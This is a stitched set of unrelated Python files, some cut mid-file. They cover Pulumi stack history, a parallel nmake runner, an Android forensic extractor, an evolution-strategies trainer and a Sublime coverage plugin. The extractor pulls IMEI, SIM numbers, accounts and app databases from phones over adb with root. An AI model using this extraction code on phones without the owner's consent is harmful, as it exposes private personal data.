Returns a list summarizing all previous and current results from Stack lifecycle operations
(up/preview/refresh/destroy).
:param page_size: Paginate history entries (used in combination with page), defaults to all.
:param page: Paginate history entries (used in combination with page_size), defaults to all.
:returns: List[UpdateSummary]
"""
args = ["stack", "history", "--json", "--show-secrets"]
if page_size is not None:
# default page=1 when page_size is set
if page is None:
page = 1
args.extend(["--page-size", str(page_size), "--page", str(page)])
result = self._run_pulumi_cmd_sync(args)
summary_list = json.loads(result.stdout)
summaries: List[UpdateSummary] = []
for summary_json in summary_list:
summary = UpdateSummary(kind=summary_json["kind"],
start_time=datetime.strptime(summary_json["startTime"], _DATETIME_FORMAT),
message=summary_json["message"],
environment=summary_json["environment"],
config=summary_json["config"],
result=summary_json["result"],
end_time=datetime.strptime(summary_json["endTime"], _DATETIME_FORMAT),
version=summary_json["version"] if "version" in summary_json else None,
deployment=summary_json["Deployment"] if "Deployment" in summary_json else None,
resource_changes=summary_json["resourceChanges"] if "resourceChanges" in summary_json else None)
summaries.append(summary)
return summaries
def info(self) -> Optional[UpdateSummary]:
"""
Returns the current results from Stack lifecycle operations.
:returns: Optional[UpdateSummary]
"""
history = self.history(page_size=1)
if not history:
return None
return history[0]
def cancel(self) -> None:
"""
Cancel stops a stack's currently running update. It returns an error if no update is currently running.
Note that this operation is _very dangerous_, and may leave the stack in an inconsistent state
if a resource operation was pending when the update was canceled.
This command is not supported for local backends.
"""
self._run_pulumi_cmd_sync(["cancel", "--yes"])
def export_stack(self) -> Deployment:
"""
export_stack exports the deployment state of the stack.
This can be combined with Stack.import_state to edit a stack's state (such as recovery from failed deployments).
:returns: Deployment
"""
return self.workspace.export_stack(self.name)
def import_stack(self, state: Deployment) -> None:
"""
import_stack imports the specified deployment state into a pre-existing stack.
This can be combined with Stack.export_state to edit a stack's state (such as recovery from failed deployments).
:param state: The deployment state to import.
"""
return self.workspace.import_stack(self.name, state)
def _run_pulumi_cmd_sync(self,
args: List[str],
on_output: Optional[OnOutput] = None) -> CommandResult:
envs = {"PULUMI_DEBUG_COMMANDS": "true"}
if self.workspace.pulumi_home is not None:
envs = {**envs, "PULUMI_HOME": self.workspace.pulumi_home}
envs = {**envs, **self.workspace.env_vars}
additional_args = self.workspace.serialize_args_for_op(self.name)
args.extend(additional_args)
args.extend(["--stack", self.name])
result = _run_pulumi_cmd(args, self.workspace.work_dir, envs, on_output)
self.workspace.post_command_callback(self.name)
return result
def _parse_extra_args(**kwargs) -> List[str]:
extra_args: List[str] = []
message = kwargs.get("message")
expect_no_changes = kwargs.get("expect_no_changes")
diff = kwargs.get("diff")
replace = kwargs.get("replace")
target = kwargs.get("target")
target_dependents = kwargs.get("target_dependents")
parallel = kwargs.get("parallel")
if message:
extra_args.extend(["--message", message])
if expect_no_changes:
extra_args.append("--expect-no-changes")
if diff:
extra_args.append("--diff")
if replace:
for r in replace:
extra_args.extend(["--replace", r])
if target:
for t in target:
extra_args.extend(["--target", t])
if target_dependents:
extra_args.append("--target-dependents")
if parallel:
extra_args.extend(["--parallel", str(parallel)])
return extra_args
def fully_qualified_stack_name(org: str, project: str, stack: str) -> str:
"""
Returns a stack name formatted with the greatest possible specificity:
org/project/stack or user/project/stack
Using this format avoids ambiguity in stack identity guards creating or selecting the wrong stack.
Note that filestate backends (local file, S3, Azure Blob) do not support stack names in this
format, and instead only use the stack name without an org/user or project to qualify it.
See: https://github.com/pulumi/pulumi/issues/2522
:param org: The name of the org or user.
:param project: The name of the project.
:param stack: The name of the stack.
:returns: The fully qualified stack name.
"""
return f"{org}/{project}/{stack}"
def _create_log_file(command: str) -> Tuple[str, tempfile.TemporaryDirectory]:
log_dir = tempfile.TemporaryDirectory(prefix=f"automation-logs-{command}-") # pylint: disable=consider-using-with
filepath = os.path.join(log_dir.name, "eventlog.txt")
# Open and close the file to ensure it exists before we start polling for logs
with open(filepath, "w+"):
pass
return filepath, log_dir
def _watch_logs(filename: str, callback: OnEvent):
with open(filename) as f:
while True:
line = f.readline()
# sleep if file hasn't been updated
if not line:
time.sleep(0.1)
continue
event = EngineEvent.from_json(json.loads(line))
callback(event)
# if this is the cancel event, stop watching logs.
if event.cancel_event:
break
def _cleanup(temp_dir: Optional[tempfile.TemporaryDirectory],
thread: Optional[threading.Thread],
on_exit_fn: Optional[Callable[[], None]] = None) -> None:
# If there's an on_exit function, execute it (used in preview/up to shut down server)
if on_exit_fn:
on_exit_fn()
# If we started a thread to watch logs, wait for it to terminate, timing out after 5 seconds.
if thread:
thread.join(5)
# If we created a temp_dir for the logs, clean up.
if temp_dir:
temp_dir.cleanup()
|
NmakeSubdirs.py | # @file NmakeSubdirs.py
# This script support parallel build for nmake in windows environment.
# It supports Python2.x and Python3.x both.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replace for NmakeSubdirs.bat in windows ,support parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
if WorkDir is None:
WorkDir = os.curdir
if "stderr" not in kwargs:
kwargs["stderr"] = subprocess.STDOUT
if "stdout" not in kwargs:
kwargs["stdout"] = subprocess.PIPE
p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
stdout, stderr = p.communicate()
message = ""
if stdout is not None:
message = stdout.decode(encoding='utf-8', errors='ignore') #for compatibility in python 2 and 3
if p.returncode != 0:
raise RuntimeError("Error while execute command \'{0}\' in direcotry {1}\n{2}".format(" ".join(Args), WorkDir, message))
output_lock.acquire(True)
print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
print(message)
output_lock.release()
return p.returncode, stdout
class TaskUnit(object):
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __eq__(self, other):
return id(self).__eq__(id(other))
def run(self):
return self.func(*self.args, **self.kwargs)
def __str__(self):
para = list(self.args)
para.extend("{0}={1}".format(k, v)for k, v in self.kwargs.items())
return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
def __init__(self, maxthread):
self._processNum = maxthread
self.pending = []
self.running = []
self.pendingLock = threading.Lock()
self.runningLock = threading.Lock()
self.error = False
self.errorLock = threading.Lock()
self.errorMsg = "errorMsg"
def addTask(self, func, *args, **kwargs):
self.pending.append(TaskUnit(func, args, kwargs))
def waitComplete(self):
self._schedule.join()
def startSchedule(self):
self._schedule = threading.Thread(target=self.Schedule)
self._schedule.start()
def Schedule(self):
for i in range(self._processNum):
task = threading.Thread(target=self.startTask)
task.daemon = False
self.running.append(task)
self.runningLock.acquire(True)
for thread in self.running:
thread.start()
self.runningLock.release()
while len(self.running) > 0:
time.sleep(0.1)
if self.error:
print("subprocess not exit sucessfully")
print(self.errorMsg)
def startTask(self):
while True:
if self.error:
break
self.pendingLock.acquire(True)
if len(self.pending) == 0:
self.pendingLock.release()
break
task = self.pending.pop(0)
self.pendingLock.release()
try:
task.run()
except RuntimeError as e:
if self.error: break
self.errorLock.acquire(True)
self.error = True
self.errorMsg = str(e)
time.sleep(0.1)
self.errorLock.release()
break
self.runningLock.acquire(True)
self.running.remove(threading.currentThread())
self.runningLock.release()
def Run():
curdir = os.path.abspath(os.curdir)
if len(args.subdirs) == 1:
args.jobs = 1
if args.jobs == 1:
try:
for dir in args.subdirs:
RunCommand(os.path.join(curdir, dir), "nmake", args.target, stdout=sys.stdout, stderr=subprocess.STDOUT)
except RuntimeError:
exit(1)
else:
controller = ThreadControl(args.jobs)
for dir in args.subdirs:
controller.addTask(RunCommand, os.path.join(curdir, dir), "nmake", args.target)
controller.startSchedule()
controller.waitComplete()
if controller.error:
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
parser.add_argument("target", help="the target for nmake")
parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
parser.add_argument("--jobs", type=int, dest="jobs", default=cpu_count, help="thread number")
parser.add_argument('--version', action='version', version=__version__)
args = parser.parse_args()
Run()
|
driller.py | import os
import re
import time
import shutil
import logging
import tarfile
import pathlib
import tempfile
import webbrowser
import threading
from contextlib import suppress
from timeout_decorator.timeout_decorator import TimeoutError
from . import utils
from . import engines
from . import messages
from . import decoders
from . import adb_conn
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class ChainExecution:
USER = 'shell'
ROOT = 'root'
ROOTSU = 'root-su'
DATA_STORE = 'DataStore.tar'
extract_dir = 'data'
def __init__(self, base_dir, status_msg=None, use_adb=False, **kwargs):
self.tools = utils.DrillerTools()
self.base_dir = base_dir
self.work_dir = None
self.updater = status_msg
if use_adb:
self.adb = adb_conn.ADBConn()
self.registry = decoders.Registry()
self.targets = None
self.REPORT = {}
self.DECODED = []
self.DOWNLOADS = []
self.DataStore = None
self.do_shared = kwargs.get('do_shared', False)
self.backup = kwargs.get('backup')
# self.backup_pw = kwargs.get('backup_pw') # TODO
self.tarfile = kwargs.get('tarfile')
self.src_dir = kwargs.get('src_dir')
self.WB = None
self.logger = kwargs.get('logger', logger)
def setup(self):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
data_store = os.path.join(self.work_dir, self.DATA_STORE)
self.DataStore = tarfile.open(data_store, 'a')
def CleanUp(self):
self.DataStore.close()
datastore_file = os.path.abspath(self.DataStore.fileobj.name)
utils.hash_file(datastore_file)
# Delete temp tar file
default_temp = tempfile.gettempdir()
tf = self.tarfile
if tf and os.path.isfile(tf) and tf.startswith(default_temp):
os.remove(tf)
self.update('Finished.')
def update(self, msg, info=True):
self.logger.info(msg) if info else logger.debug(msg)
if self.updater:
self.updater.set(msg)
self.updater._root.update()
def InitialAdbRead(self):
self.update('Reading information...')
def get_permission():
self.su = False
if 'root' in self.adb('exec-out id'):
self.permisson = self.ROOT
return self.permisson
try_su = self.adb('exec-out id', su=True)
if try_su is not None and self.ROOT in try_su:
self.permisson = self.ROOTSU
self.su = True
else:
self.permisson = self.USER
return self.permisson
def get_prop(prop: list, key: str):
for row in prop:
if key in row:
return row.strip().split('=')[1]
def get_wifi(dump: list):
dump = list(filter(lambda x: x.startswith('mWifiInfo'), dump))
if dump:
src = re.search(r'MAC: ([:0-9a-f]{17}),', dump[0])
if src:
return src.groups()[0]
def get_accounts(dump):
accs = re.findall(r'Account \{name=(.+?), type=(.+?)\}', dump, re.S)
return [(v, k) for k, v in accs]
# Serial, status, permissions
self.REPORT['serial'], self.REPORT['status'] = self.adb.device()
self.REPORT['permisson'] = get_permission()
# Build Props
with suppress(TimeoutError):
build_prop = self.adb('exec-out cat /system/build.prop', su=self.su, timeout=5)
if build_prop:
build_prop = build_prop.split('\n')
props = [
'ro.product.manufacturer',
'ro.product.model',
'ro.build.version.release',
'ro.build.display.id']
for p in props:
self.REPORT[p] = get_prop(build_prop, p)
# WIFI
with suppress(TimeoutError):
_wifi = self.adb('exec-out dumpsys wifi', timeout=5)
if _wifi:
self.REPORT['wifi mac'] = get_wifi(_wifi.split('\n'))
# IMEI
with suppress(TimeoutError):
_usbinfo = self.adb('exec-out dumpsys iphonesubinfo', timeout=5)
if _usbinfo:
self.REPORT['imei'] = get_prop(_usbinfo.split('\n'), 'Device ID')
# IMEI for Android v6+
# with suppress(TimeoutError):
# rex = re.compile(b' ([0-9a-f]{8})')
# _data = self.adb('adb shell service call iphonesubinfo 1', timeout=2)
# if _data and len(_data) > 9:
# plen = int(b''.join(_data[:2]), 16)
# Time
with suppress(TimeoutError):
self.REPORT['local_time'] = time.strftime('%Y-%m-%d %H:%M:%S %Z')
rtime = self.adb(['shell', 'date', r'+%F\ %T\ %Z'], timeout=5)
# breakpoint()
self.REPORT['device_time'] = rtime.split(self.adb.rmr.decode())[-1]
# SIM Card
with suppress(TimeoutError, Exception):
if self.adb.exists('/data/system/SimCard.dat'):
_simdat = self.adb('exec-out cat /data/system/SimCard.dat', su=self.su, timeout=5)
sims = [
'CurrentSimSerialNumber',
'CurrentSimPhoneNumber',
'CurrentSimOperatorName',
'PreviousSimSerialNumber',
'PreviousSimPhoneNumber']
if _simdat:
_simdat = _simdat.split('\n')
for s in sims:
self.REPORT[s] = get_prop(_simdat, s)
# Accounts
with suppress(TimeoutError):
_acc = self.adb('exec-out dumpsys account', timeout=5)
self.REPORT['accounts'] = get_accounts(_acc)
@staticmethod
def clean_name(value):
return re.sub(r'[\s\/:*?"<>|]', '', value)
def CreateWorkDir(self):
date_ = time.strftime('%Y-%m-%d')
time_ = time.strftime('%H.%M.%S')
try:
self.work_dir = os.path.join(
self.base_dir,
'{}_{}_{}_{}'.format(
self.clean_name(
self.REPORT.get('ro.product.manufacturer', self.REPORT['serial'])),
self.clean_name(
self.REPORT.get('ro.product.model', self.REPORT['permisson'])),
date_, time_,))
except Exception:
self.work_dir = os.path.join(self.base_dir, f'andriller_extraction_{date_}_{time_}')
self.output_dir = os.path.join(self.base_dir, self.work_dir, self.extract_dir)
self.logger.debug(f'work_dir:{self.work_dir}')
self.logger.debug(f'output_dir:{self.output_dir}')
self.setup()
def download_file(self, file_path):
"""
Return values:
True = file downloaded
False = file does not exist, or failed to get in full size
None = file exists but has no size
"""
file_remote = self.adb.exists(file_path, su=self.su)
if file_remote:
file_name = os.path.basename(file_remote)
file_local = os.path.join(self.output_dir, file_name)
remote_size = self.adb.get_size(file_path, su=self.su)
file_saveas = os.path.join(
os.path.split(file_local)[0],
os.path.split(file_remote)[1])
if remote_size == 0:
return None
self.logger.info(f'{file_remote} ({remote_size} bytes)')
if self.permisson == self.ROOT:
self.adb.pull_file(file_path, file_local)
if os.path.exists(file_local):
self.DataStore.add(file_saveas, file_remote)
self.DOWNLOADS.append(file_name)
return True
elif self.permisson == self.ROOTSU:
for _ in range(100):
file_obj = self.adb.get_file(file_path, su=self.su)
if file_obj:
# remote_size = remote_size if remote_size else len(file_obj)
if len(file_obj) == remote_size:
with open(file_saveas, 'wb') as W:
W.write(file_obj)
self.DataStore.add(file_saveas, file_remote)
self.DOWNLOADS.append(file_name)
return True
time.sleep(0.25)
self.logger.debug(f'Trying again for {file_name} ({len(file_obj)} bytes)')
else:
self.logger.warning(f'Failed getting file: {file_name}')
return False
def do_backup(self, ALL=True, shared=False, backup_name='backup.ab'):
backup_file = os.path.join(self.work_dir, backup_name)
cmd = [
'backup',
'-shared' if shared else '',
'-all' if ALL else '',
'-f',
backup_file,
]
com = threading.Thread(target=lambda: self.adb(cmd))
com.start()
if self.updater:
messages.msg_do_backup()
while com.is_alive():
time.sleep(0.5)
if os.path.exists(backup_file):
_size = os.path.getsize(backup_file)
self.update(f'Reading backup: {utils.human_bytes(_size)}', info=False)
self.backup = backup_file
def AndroidBackupToTar(self):
self.update('Unpacking backup...')
self.tarfile = self.tools.ab_to_tar(self.backup)
def ExtractFromTar(self, targets=[]):
self.update('Extracting from backup...')
for fn in self.tools.extract_form_tar(
self.tarfile,
self.output_dir,
targets=targets):
self.DataStore.add(os.path.join(self.output_dir, fn), fn)
self.DOWNLOADS.append(fn)
def get_targets(self):
self.targets = [*map(pathlib.PurePath, self.registry.get_posix_links())]
def in_targets(self, target):
if not self.targets:
self.get_targets()
target = pathlib.PureWindowsPath(target).as_posix()
for f in self.targets:
if f.match(target):
return True
return False
@staticmethod
def extract_form_dir(src_dir):
src_dir_path = pathlib.Path(src_dir)
for fobj in src_dir_path.rglob('**/*'):
if fobj.is_file():
yield fobj
def ExtractFromDir(self):
self.update('Extracting from directory...')
src_dir_path = pathlib.Path(self.src_dir)
for fobj in self.extract_form_dir(self.src_dir):
fn = fobj.relative_to(src_dir_path)
if self.in_targets(fn.name):
self.logger.info(fn.name)
shutil.copy2(fobj, os.path.join(self.output_dir, fn.name))
self.DOWNLOADS.append(os.path.basename(fn))
def enumerate_files(self, target_dir='/'):
FILES = []
for f in self.adb_iter(f'find {target_dir} -type f -readable'):
FILES.append(f)
def DataAcquisition(self, run_backup=False, shared=False):
self.update('Acquiring data...')
if not run_backup and self.ROOT in self.permisson:
if shared:
self.update('Acquiring shared storage...')
self.do_backup(ALL=False, shared=True, backup_name='shared.ab')
self.update('Acquiring databases via root...')
for file_path in self.registry.get_root_links():
self.download_file(file_path)
elif run_backup or self.permisson == self.USER:
self.do_backup(shared=shared)
if self.backup and os.path.getsize(self.backup) <= 2 ** 10:
self.logger.error('Android backup failed - too small.')
self.backup = False
def DataExtraction(self):
self.update('Extracting data from source...')
if self.backup:
self.AndroidBackupToTar()
if self.tarfile:
targets = self.registry.get_all_links()
# Perhaps change to posix links?
self.ExtractFromTar(targets=targets)
# if self.DataStore and self.DataStore.members:
# pass # TODO!
def DecodeShared(self):
try:
if self.backup or (self.do_shared and self.backup):
self.update('Decoding shared filesystem...')
deco = decoders.SharedFilesystemDecoder(self.work_dir, self.backup)
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
except Exception as err:
logger.exception(f'Shared decoder error: {err}')
def DataDecoding(self):
self.update('Decoding extracted data...')
self.logger.debug(self.DOWNLOADS)
workbook = self.get_master_workbook()
for file_name in filter(None.__ne__, self.DOWNLOADS):
if self.registry.has_target(file_name):
for deco_class in self.registry.decoders_target(file_name):
file_path = os.path.join(self.output_dir, file_name)
try:
self.logger.info(f'Decoding {file_name} using {deco_class.__name__}')
deco = deco_class(self.work_dir, file_path)
if not deco.template_name:
continue
self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
deco.report_xlsx(workbook=workbook)
except Exception as e:
logger.error(f'Decoding error for `{os.path.basename(file_name)}`: {e}')
logger.exception(str(e))
def GenerateHtmlReport(self, open_html=True):
self.update('Generating HTML report...')
env = engines.get_engine()
template_name = 'REPORT.html'
template = env.get_template(template_name)
report_file = os.path.join(self.work_dir, template_name)
with open(report_file, 'w') as W:
W.write(template.render(
report=self.REPORT.items(),
decoded=self.DECODED,
**engines.get_head_foot()))
if open_html:
report_uri = pathlib.Path(report_file).as_uri()
webbrowser.open_new_tab(report_uri)
def get_master_workbook(self):
self.WB = engines.Workbook(self.work_dir, 'REPORT')
self.summary_sheet = self.WB.add_sheet('Summary')
self.WB.write_header(self.summary_sheet, ['Extraction Summary'])
return self.WB
def GenerateXlsxReport(self):
self.update('Generating XLSX report...')
for row, summary in enumerate(self.DECODED, start=1):
self.summary_sheet.write_row(row, 0, summary[1:])
self.WB.close()
# -----------------------------------------------------------------------------
class DecodingError(Exception):
pass
|
ES_train.py | from __future__ import absolute_import, division, print_function
import os
from multiprocessing import Process
import math
import argparse
import logging
import numpy as np
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from torch.autograd import Variable
from envs import create_env
from models.ES import ES
#logger
logger = logging.getLogger("universe-server")
logger.setLevel(logging.INFO)
def ES_train(env_name):
"""Train Evolution Strategies model in separate process not to block Flask"""
p = Process(target=train_model, args=(env_name,1))
p.start()
def train_model(env_name, num_threads):
"""Train and save the model"""
# set parameters as namespace object and give them values
args = argparse.Namespace()
args.env_name = env_name
args.lr = 0.3 # learning rate
args.lr_decay = 1 #learning rate decay
args.sigma = 0.05 # noise standard deviation
args.n = 40 # batch size (even number)
args.max_episode_length = 10 # maximum length of an episode 100000
args.max_gradient_updates = 10 # 100000
args.restore = '' # restore checkpoint
args.variable_ep_len = False # Change max episode length during training
args.silent = False # Prints during training
env = create_env(args.env_name, client_id="ES1", remotes=1) # Local docker container
chkpt_dir = 'checkpoints/%s/' % args.env_name
if not os.path.exists(chkpt_dir):
os.makedirs(chkpt_dir)
synced_model = ES(env.observation_space.shape[0], env.action_space)
for param in synced_model.parameters():
param.requires_grad = False
if args.restore:
state_dict = torch.load(args.restore)
synced_model.load_state_dict(state_dict)
train_loop(args, synced_model, env, chkpt_dir)
def do_rollouts(args, models, random_seeds, return_queue, env, are_negative):
"""
For each model, do a rollout.
"""
all_returns = []
all_num_frames = []
for model in models:
cx = Variable(torch.zeros(1, 256))
hx = Variable(torch.zeros(1, 256))
state = env.reset()
state = torch.from_numpy(state)
this_model_return = 0
this_model_num_frames = 0
# Rollout
for step in range(args.max_episode_length):
logit, (hx, cx) = model(
(Variable(state.unsqueeze(0), volatile=True),
(hx, cx)))
prob = F.softmax(logit)
action = prob.max(1)[1].data.numpy()
state, reward, done, _ = env.step(action[0, 0])
logger.info()
this_model_return += reward
this_model_num_frames += 1
if done:
break
state = torch.from_numpy(state)
all_returns.append(this_model_return)
all_num_frames.append(this_model_num_frames)
return_queue.put((random_seeds, all_returns, all_num_frames, are_negative))
def perturb_model(args, model, random_seed, env):
"""
Modifies the given model with a pertubation of its parameters,
as well as the negative perturbation, and returns both perturbed
models.
"""
new_model = ES(env.observation_space.shape[0],
env.action_space)
anti_model = ES(env.observation_space.shape[0],
env.action_space)
new_model.load_state_dict(model.state_dict())
anti_model.load_state_dict(model.state_dict())
np.random.seed(random_seed)
for (k, v), (anti_k, anti_v) in zip(new_model.es_params(),
anti_model.es_params()):
eps = np.random.normal(0, 1, v.size())
v += torch.from_numpy(args.sigma*eps).float()
anti_v += torch.from_numpy(args.sigma*-eps).float()
return [new_model, anti_model]
optimConfig = []
averageReward = []
maxReward = []
minReward = []
episodeCounter = []
def gradient_update(args, synced_model, returns, random_seeds, neg_list,
num_eps, num_frames, chkpt_dir, unperturbed_results):
def fitness_shaping(returns):
"""
A rank transformation on the rewards, which reduces the chances
of falling into local optima early in training.
"""
sorted_returns_backwards = sorted(returns)[::-1]
lamb = len(returns)
shaped_returns = []
denom = sum([max(0, math.log(lamb/2 + 1, 2) -
math.log(sorted_returns_backwards.index(r) + 1, 2))
for r in returns])
for r in returns:
num = max(0, math.log(lamb/2 + 1, 2) -
math.log(sorted_returns_backwards.index(r) + 1, 2))
shaped_returns.append(num/denom + 1/lamb)
return shaped_returns
def unperturbed_rank(returns, unperturbed_results):
nth_place = 1
for r in returns:
if r > unperturbed_results:
nth_place += 1
rank_diag = ('%d out of %d (1 means gradient '
'is uninformative)' % (nth_place,
len(returns) + 1))
return rank_diag, nth_place
batch_size = len(returns)
assert batch_size == args.n
assert len(random_seeds) == batch_size
shaped_returns = fitness_shaping(returns)
rank_diag, rank = unperturbed_rank(returns, unperturbed_results)
print('Episode num: %d\n'
'Average reward: %f\n'
'Variance in rewards: %f\n'
'Max reward: %f\n'
'Min reward: %f\n'
'Batch size: %d\n'
'Max episode length: %d\n'
'Sigma: %f\n'
'Learning rate: %f\n'
'Total num frames seen: %d\n'
'Unperturbed reward: %f\n'
'Unperturbed rank: %s\n\n' %
(num_eps, np.mean(returns), np.var(returns), max(returns),
min(returns), batch_size,
args.max_episode_length, args.sigma, args.lr, num_frames,
unperturbed_results, rank_diag))
averageReward.append(np.mean(returns))
episodeCounter.append(num_eps)
maxReward.append(max(returns))
minReward.append(min(returns))
# For each model, generate the same random numbers as we did
# before, and update parameters. We apply weight decay once.
for i in range(args.n):
np.random.seed(random_seeds[i])
multiplier = -1 if neg_list[i] else 1
reward = shaped_returns[i]
for k, v in synced_model.es_params():
eps = np.random.normal(0, 1, v.size())
v += torch.from_numpy(args.lr/(args.n*args.sigma) *
(reward*multiplier*eps)).float()
args.lr *= args.lr_decay
torch.save(synced_model.state_dict(),
os.path.join(chkpt_dir, 'latest.pth'))
return synced_model
def generate_seeds_and_models(args, synced_model, env):
"""
Returns a seed and 2 perturbed models
"""
np.random.seed()
random_seed = np.random.randint(2**30)
two_models = perturb_model(args, synced_model, random_seed, env)
return random_seed, two_models
def train_loop(args, synced_model, env, chkpt_dir):
def flatten(raw_results, index):
notflat_results = [result[index] for result in raw_results]
return [item for sublist in notflat_results for item in sublist]
logger.info("Num params in network %d" % synced_model.count_parameters())
num_eps = 0
total_num_frames = 0
for _ in range(args.max_gradient_updates):
processes = []
return_queue = mp.Queue()
all_seeds, all_models = [], []
# Generate a perturbation and its antithesis
for j in range(int(args.n/2)):
random_seed, two_models = generate_seeds_and_models(args,
synced_model,
env)
# Add twice because we get two models with the same seed
all_seeds.append(random_seed)
all_seeds.append(random_seed)
all_models += two_models
assert len(all_seeds) == len(all_models)
# Keep track of which perturbations were positive and negative
# Start with negative true because pop() makes us go backwards
is_negative = True
# Add all peturbed models to the queue
while all_models:
perturbed_model = all_models.pop()
seed = all_seeds.pop()
p = mp.Process(target=do_rollouts, args=(args,
[perturbed_model],
[seed],
return_queue,
env,
[is_negative]))
p.start()
processes.append(p)
is_negative = not is_negative
assert len(all_seeds) == 0
# Evaluate the unperturbed model as well
p = mp.Process(target=do_rollouts, args=(args, [synced_model],
['dummy_seed'],
return_queue, env,
['dummy_neg']))
p.start()
processes.append(p)
for p in processes:
p.join()
raw_results = [return_queue.get() for p in processes]
seeds, results, num_frames, neg_list = [flatten(raw_results, index)
for index in [0, 1, 2, 3]]
# Separate the unperturbed results from the perturbed results
_ = unperturbed_index = seeds.index('dummy_seed')
seeds.pop(unperturbed_index)
unperturbed_results = results.pop(unperturbed_index)
_ = num_frames.pop(unperturbed_index)
_ = neg_list.pop(unperturbed_index)
total_num_frames += sum(num_frames)
num_eps += len(results)
synced_model = gradient_update(args, synced_model, results, seeds,
neg_list, num_eps, total_num_frames,
chkpt_dir, unperturbed_results)
if args.variable_ep_len:
args.max_episode_length = int(2*sum(num_frames)/len(num_frames))
|
PyCover.py | from __future__ import print_function
import os
import sublime
import sublime_plugin
import subprocess
import sys
import time
import threading
SETTINGS = None
def plugin_loaded():
global SETTINGS
SETTINGS = sublime.load_settings('PyCover.sublime-settings')
if SETTINGS and SETTINGS.get('python') is not None:
print('Loaded settings for PyCover')
else:
print('Error loading settings for PyCover')
if sys.version_info[0] == 2:
sublime.set_timeout(plugin_loaded, 0)
class SublimePythonCoverageListener(sublime_plugin.EventListener):
"""Event listener to highlight uncovered lines when a Python file loads."""
def on_load(self, view):
if SETTINGS.get('onload', False) and 'source.python' in view.scope_name(0):
view.run_command('show_python_coverage')
class ShowPythonCoverageCommand(sublime_plugin.TextCommand):
"""Highlight uncovered lines in the current file
based on a previous coverage run."""
def is_visible(self):
return self.is_enabled()
def is_enabled(self):
return 'source.python' in self.view.scope_name(0)
def run(self, edit):
fname = self.view.file_name()
if not self.is_enabled() or not fname:
return
local_settings = self.view.settings()
if local_settings.get('showing', False):
self.view.erase_regions('PyCover')
local_settings.set('showing', False)
return # Toggle off
cov_file = find(fname, '.coverage')
if not cov_file:
status_report('Could not find .coverage file for %s' % fname, wrap=True)
return
cov_config = find(fname, '.coveragerc') or ''
# run missing_lines.py with the correct paths
python = SETTINGS.get('python', '')
if not python:
python = which('python')
ml_file = os.path.join(sublime.packages_path(), 'PyCover', 'scripts',
'missing_lines.py')
p = subprocess.Popen([python, ml_file, cov_file, cov_config, fname],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
threading.Thread(target=missing_lines_callback, args=(self.view, p)).start()
def missing_lines_callback(view, proc, poll_sleep=0.1, poll_timeout=10):
progress_status = lambda: sublime.status_message('Finding missing lines...')
sublime.set_timeout(progress_status, 0)
# poll for results
tic = time.time()
while proc.poll() is None:
if time.time() - tic > poll_timeout:
msg = 'missing_lines.py timed out after %f s' % (time.time() - tic)
status_report(msg, wrap=True)
proc.kill()
return
time.sleep(poll_sleep)
sublime.set_timeout(progress_status, 0)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
status_report(stderr.decode('UTF-8'), wrap=True)
return
# read stdout to parse missing lines
missing_lines = map(int, stdout.decode('UTF-8').splitlines())
# update highlighted regions
sublime.set_timeout(lambda: _update_highlighted(view, missing_lines), 0)
def _update_highlighted(view, missing_lines):
outlines = [
view.full_line(view.text_point(line_num-1, 0))
for line_num in missing_lines]
view.erase_regions('PyCover')
if outlines:
view.add_regions('PyCover', outlines, 'markup.inserted',
'Packages/PyCover/themes/default/bar.png', sublime.HIDDEN)
view.settings().set('showing', True)
status_report('%d missing lines annotated.' % len(outlines))
def find(base, *rel, **kwargs):
access = kwargs.get('access', os.R_OK)
rel = os.path.join(*rel)
while True:
path = os.path.join(base, rel)
if os.access(path, access):
return path
baseprev, base = base, os.path.dirname(base)
if not base or base == baseprev:
return
def which(progname):
exts = os.environ.get('PATHEXT', '').split(os.pathsep)
for path in os.environ['PATH'].split(os.pathsep):
for ext in exts:
fullpath = os.path.join(path, progname + ext)
if os.path.exists(fullpath):
return fullpath
return None
def status_report(message, wrap=False):
print('PyCover:', message)
if wrap:
sublime.set_timeout(lambda: sublime.status_message(message), 0)
else:
sublime.status_message(message)
|
main.py | from concurrent.futures import ThreadPoolExecutor
from datetime import datetime, timedelta, timezone
from multiprocessing.dummy import Pool as ThreadPool
from os import mkdir, path, system, name
from random import choice
from re import compile
from threading import Thread, Lock
from time import sleep, strftime, time, gmtime
from traceback import format_exc
from cloudscraper import create_scraper
from colorama import init, Fore
from console.utils import set_title
from easygui import fileopenbox
from requests import Session, exceptions
from yaml import safe_load
version = 'CN1.0'
default_values = f'''# ________ ____ ___
# \_____ \ ___ ______.__. ____ ____ ____ \ \/ /
# / | \\\ \/ < | |/ ___\_/ __ \ / \ \ /
# / | \> < \___ / /_/ > ___/| | \/ \\
# \_______ /__/\_ \/ ____\___ / \___ >___| /___/\ \\
